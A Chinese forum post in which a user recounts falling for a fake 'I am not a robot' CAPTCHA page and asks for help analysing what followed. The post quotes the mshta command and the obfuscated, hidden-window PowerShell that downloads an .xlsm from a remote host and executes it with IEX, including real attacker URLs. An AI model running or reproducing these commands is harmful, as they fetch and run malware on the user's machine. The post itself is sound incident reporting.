我也遇到了相似的情况,不小心访问了
https://objectstorage.ap-singapore-2.oraclecloud.com/n/ax4mqlu25efi/b/tozeyourslok/o/preload-verif-processing.html,
执行了mshta
https://jackios.shop/surfinglo.mp3 # # Ⅰ ɑm ոօt ɑ ɾօbօt: ϹΑΡΤCHA Verіfіcаtіοո UID: 181902。
这个mp3文件看上去像是正常的音频文件,实际上里面夹带私货,有<script>标签,跟踪下来最后是用powershell执行了这个
iexStart-Process "$env:WINDIR\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ArgumentList '-NoProfile','-ExecutionPolicy','Unrestricted','-Command','SV ut ([Net.WebClient]::New());SI
Variable:3S (((([Net.WebClient]::New()|Get-Member)|?{(Get-ChildItem Variable:/_).Value.Name -clike ''*wn*g''}).Name));Set-Item Variable:\p ''
https://h1.yyoiy.shop/750413b4e6897a671bc759e04597952a0be747830189873b.xlsm'';IEX (Get-Item Variable:/ut).Value.((Get-Item Variable:3S).Value)((Variable p -ValueOn))';$GdLKafMo = $env:AppData;function AKbE($MqPitd, $zYWMTrhxs){curl $MqPitd -o $zYWMTrhxs};function ZHMeh
(){function JUrNP($nbaVWwQd){if(!(Test-Path -Path $zYWMTrhxs)){AKbE $nbaVWwQd $zYWMTrhxs}}}ZHMeh;
这个xlsm文件有好几万行,而且混淆过,实在是看不懂了,希望有高手能帮忙分析一下它到底干了什么,有什么危害,非常感谢